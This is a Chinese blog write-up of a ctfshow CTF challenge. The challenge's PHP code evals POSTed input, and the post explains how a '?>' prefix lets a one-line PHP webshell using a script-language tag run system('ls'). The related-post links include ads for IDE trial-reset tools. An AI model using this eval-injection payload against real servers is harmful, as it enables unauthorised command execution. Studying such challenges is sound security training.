ctfshow新手杯-[easy-eval]

最新推荐文章于 2024-09-10 08:26:51 发布
最新推荐文章于 2024-09-10 08:26:51 发布
阅读量916 收藏 2
点赞数 3
分类专栏: CTF题目笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127265346
版权

源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
if(isset($code)){
  $code = str_replace("?","",$code);
  eval("?>".$code);
}

关键语句

eval("?>".$code);

理解

<?php
.....
  eval("?>".$code);   
}

相当于=====>>>>

<?php
.....
  ?>$code
}

?><?php相闭合,因此$code可以是没有?的一句话木马
如<script language='php'>system('ls');</script>

转化为=====>>>>

<?php
.....
  ?><script language='php'>system('ls');</script>
}
c4fx
关注
专栏目录
ctf (easy_eval)
Glacier_Mount的博客
07-02 1771
反序列化、redis
ctfshow:easy_eval
windcandy的博客
11-13 610
ctfshow,新手easy_eval ,做题记录
ctfshow 新手 web
shinygod的博客
10-09 755
基础练习
CTF秀--新手
m0_59022585的博客
07-11 239
得到密文和提示,由于国内电话都是1开头,长度为12位,则使用1000000000000相减,得到的明文使用ctfshow{}格式包裹得到flag。查看提示文件1,得知文件进行了逆序,在线恢复逆序,使用010Editor查看文件是去头的png文件,补充头部,得到png模糊的图片。解压后得到一张图片,观察为图片被切割重组过,通过裁剪查看分割的高和原图的宽,再使用脚本将图片重组得到flag。解压文件被加密处理,双击查看得到提示,结合题目提示推出密码,解压得到三个文件。
ctfshow新手(web)
m0_62422842的博客
10-07 2411
前天ctfshow举办的新手,里面的部分web题对于我来说还是有必要记录一下的。里面的大师傅都太强了。还有最后一道web,看了官方wp,有种本能的抗拒。这种题涉及的知识点超出了我的学习范围。还得继续积累知识,向大师傅们学习。
ctfshow新手wp
aarong的博客
10-10 1416
最近国庆在疯玩的时候抽空做了几题,简单记录一下。
CTFshow新手WP
qq_49746811的博客
10-06 1295
CTFshow新手WP
ide-eval-resetter-2.1.6非破解无限试用插件
06-17
一款IDEA好用的插件,适用于旗舰版,虽然只能使用三十天,不过三十天后可以重新配置使用。 可以无限延期
ide-eval-resetter-2.3.5.jar,重新定义idea使用时间
07-19
`ide-eval-resetter-2.3.5.jar` 是一个针对这个问题的第三方工具,它的主要功能是重置IntelliJ IDEA的试用期,让开发者能够继续免费体验完整版的IDE。 这个工具的版本号是2.3.5,这意味着它经过了多次迭代和改进,...
ide-eval-resetter-2.1.14.zip
05-21
这个版本2.1.14的压缩包包含了一个名为 "ide-eval-resetter" 的核心程序,它主要用于解决开发者在使用试用版IDE时遇到的评估期限制问题。 IDE(集成开发环境)是程序员进行软件开发的重要工具,如JetBrains的...
ide-eval-resetter-2.1.13.zip
08-11
使用方法: 1.首先将文件拷贝到任意的linux系统中 2.执行命令 sh ide-eval-resetter.sh 即可导出文件
ide-eval-resetter-2.3.5.zip
01-18
IDE-Eval-Resetter是一款专为JetBrains系列集成开发环境设计的插件,主要用于重置IDE的评估期,让你能够继续免费试用这些强大的开发工具。这个2.3.5版本的压缩包“ide-eval-resetter-2.3.5.zip”包含了该插件的安装...
ctfshow 新手web
qq_53063436的博客
10-08 388
ctfshow 新手web部分
CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1183
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
【Web】CTFSHOW 新手 题解
uuzeray的博客
05-02 657
先本地起个服务,先直接请求,再请求?name=Z3r4y,拿到new_rookie_info和Z3r4y_info。对比一下,其实就是要让I3为I1就可,sb后的.起到截断作用,id在name之后,name是我们可控的。$secret为$_COOKIE[secret],直接引用绕过了。可以在/change路由进行打入,用newname替换name。打PHP_SESSION_UPLOAD_PROGRESS。运行结果插到cookie里,而后便可为所欲为。当id为0时可以拿到flag。令mode为0看到源码。
ctfshow 新手必刷菜狗 谜之栅栏题解记录
Hunter Dreamer的博客
12-31 873
用010editor打开其中一个,010editor的工具里面就有比较文件选项,比较两个文件,发现有一处不同。题目说栅栏,观察一下,发现就是一边一个就组成flag了。拿到之后,有两个图片,直观看不出什么,尝试用工具比较。跑出结果,得到flag。
[ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)
热门推荐
ZXW_NUDT的博客
10-07 2万+
CTFShow新(脑洞)手(套路)
CTFSHOW新手MISC部分WriteUp
javagty6778的博客
01-09 548
简单做了一下CTFSHOW新人的MISC等部分的题目,收获还是挺大的,有兴趣的小伙伴可以去官网尝试做一下,如果喜欢本文不妨一键三连支持一下。
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
最新发布
2401_84413757的博客
09-10 685
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值